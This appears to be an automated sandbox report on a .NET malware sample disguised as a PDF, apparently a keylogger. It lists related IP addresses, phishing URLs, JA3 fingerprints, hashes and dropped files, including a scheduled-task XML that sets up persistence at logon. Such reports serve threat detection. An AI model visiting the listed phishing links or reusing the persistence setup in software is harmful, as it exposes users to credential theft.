                                                                                                                                                        rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUhttp://shorten.so/fVj82Get hashmaliciousPorn ScamBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        http://hrpibzdeam.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        https://tg.666986.xyz/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        DESCRIPTION.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UTMEMUSWOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        330tqxXVzm.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                        • 132.224.47.164
                                                                                                                                                        QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        CLOUDFLARENETUSJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        https://guf1.xemirax.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.85.129
                                                                                                                                                        MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        https://yt1s.com/en115Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.11.245
                                                                                                                                                        New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        Pedang @ P#U00ecsau.exeGet hashmaliciousBrontokBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.32.1

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttp://com-evaluate-fanpage30127.pages.dev/help/contact/671203900952887Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://docusign6478.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://hrpibzdeam.xyz/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Drogerie-K%C3%B6rperpflege/b/?ie=UTF8&node=64187031&ref_=nav_cs_hpcGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://ciiscp.org/wordpress/mail.uu.se.htmlGet hashmaliciousOutlook PhishingBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://metawavetech-rho.vercel.app/gyQydv$g=JswGhjsY=LbngjTsm_Ln@vGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://solocyberuser.github.io/netflix/html/home.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://harshit-gupta-khatuji.github.io/khatuji_internGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        http://imqtokjen.com/zh.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://vanjali03.github.io/amazon/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rDEKONT-1_16_2025__75kb__pdf.exe.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1216
                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\teXfNv.exe.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1216
                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2232
                                                                                                                                                        Entropy (8bit):5.380805901110357
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZMtUyus:lGLHxvCsIfA2KRHmOugras
                                                                                                                                                        MD5:F9646C8312632E8167595451BC4DFDB6
                                                                                                                                                        SHA1:B81D5807E9E9B8F7544A00F0540F8BB2AE0565E8
                                                                                                                                                        SHA-256:45D08042B8EC983CBAA45723BD6287E627218E2DF7FF55169E8FB78C0654A573
                                                                                                                                                        SHA-512:03454A3ED416D58614996AC6F2D97232F3369E5402A037AD1253535DB4B0EEA46F582A838EEC0C9AF542091FBD7AC3B3A415C92FD9661F3D6B1C409EFF7AED4E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqbi5kyb.0pr.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exfbnh2e.npc.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fp5zlfjc.5xo.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjku2vpj.lau.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1572
                                                                                                                                                        Entropy (8bit):5.1064332696342065
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtataxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTlv
                                                                                                                                                        MD5:20A72532580DF0A2ADAB6A6813B39ED5
                                                                                                                                                        SHA1:6B638B2E5AEE19FB562147FA007A97CC38B2ABEA
                                                                                                                                                        SHA-256:1CFD1FA3FFB0AE319E3E56C05EBE66A97B8D2F9ED2EC3353BADCE0AE5254F733
                                                                                                                                                        SHA-512:6E03CC73FD703DD6326931646C7953C6225C1421BBA282CE42132D0ABD5796F3963D81EAFCCFF5805A31B3D66A4A03F2ED7B013225655A8194000583FEF4EB4D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpC16A.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1572
                                                                                                                                                        Entropy (8bit):5.1064332696342065
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtataxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTlv
                                                                                                                                                        MD5:20A72532580DF0A2ADAB6A6813B39ED5
                                                                                                                                                        SHA1:6B638B2E5AEE19FB562147FA007A97CC38B2ABEA
                                                                                                                                                        SHA-256:1CFD1FA3FFB0AE319E3E56C05EBE66A97B8D2F9ED2EC3353BADCE0AE5254F733
                                                                                                                                                        SHA-512:6E03CC73FD703DD6326931646C7953C6225C1421BBA282CE42132D0ABD5796F3963D81EAFCCFF5805A31B3D66A4A03F2ED7B013225655A8194000583FEF4EB4D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                        C:\Users\user\AppData\Roaming\teXfNv.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):933888
                                                                                                                                                        Entropy (8bit):7.5993791841163345
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:7uGlcxORH/ZzPIHhHh79f1P7RTpmZl/7kcmsbY:7uOLUhrP7RTYr
                                                                                                                                                        MD5:14246EA59962956247CB757FF4C485E8
                                                                                                                                                        SHA1:41233827E40EACDC99A408D0B0ECFE78EE24120C
                                                                                                                                                        SHA-256:F89D5DB1D93B61D6E6346FA86E914A5B02E927C8EEE905E658B0818F76A545CA
                                                                                                                                                        SHA-512:8DDA3374A819F3BE57A2793094A77B663AF924268E810EB36872E1B308C3FAA0BF1DC374D26AD1CE94D6D86A5E958A8BFF4B9D647658C0D1265B378857EA1E00
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 28%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g..............0......8.......$... ...@....... ....................................@.................................p$..K....@...5........................................................................... ............... ..H............text........ ...................... ..`.rsrc....5...@...6..................@..@.reloc...............>..............@..B.................$......H...........X.......O...8...................................................t..|.x.b.P..I...L.O.}D..k.<.2..y.!....rg../....Z...,}.....W..E..m..y..{._.p...#.y..l.Y..u..}b.(.x...1.k..1V.P...w6.<4BY..y..Q..z2.fa....a..8E..X....WI..e.C...!.......;G.........fW..%*.W...8.O....x@.X...P...B.....5.[.$.<%X...'.tJ.YF...E.{.`A%S.FLN{7......T.*-.y1...y.rJZ.[Ip....2y//..8(*..I....K.0..n{.L(...H..-.....<.F. . .r.<.q.#8.B............D.........cT~..y.}a9x...e;...b).s.".^}q8.4..

                                                                                                                                                        C:\Users\user\AppData\Roaming\teXfNv.exe:Zone.Identifier

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26
                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Entropy (8bit):7.5993791841163345
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                        File name:rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5:14246ea59962956247cb757ff4c485e8
                                                                                                                                                        SHA1:41233827e40eacdc99a408d0b0ecfe78ee24120c
                                                                                                                                                        SHA256:f89d5db1d93b61d6e6346fa86e914a5b02e927c8eee905e658b0818f76a545ca
                                                                                                                                                        SHA512:8dda3374a819f3be57a2793094a77b663af924268e810eb36872e1b308c3faa0bf1dc374d26ad1ce94d6d86a5e958a8bff4b9d647658c0d1265b378857ea1e00
                                                                                                                                                        SSDEEP:24576:7uGlcxORH/ZzPIHhHh79f1P7RTpmZl/7kcmsbY:7uOLUhrP7RTYr
                                                                                                                                                        TLSH:F715BFC03B25B70ECD6DAD35893AECB4A22029697105F6E379DE2B5BB5CD247990CF40
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......8.......$... ...@....... ....................................@................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:7fe6e7e7e3e3651f

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x110e24be
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x11000000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x678883E5 [Thu Jan 16 03:58:29 2025 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
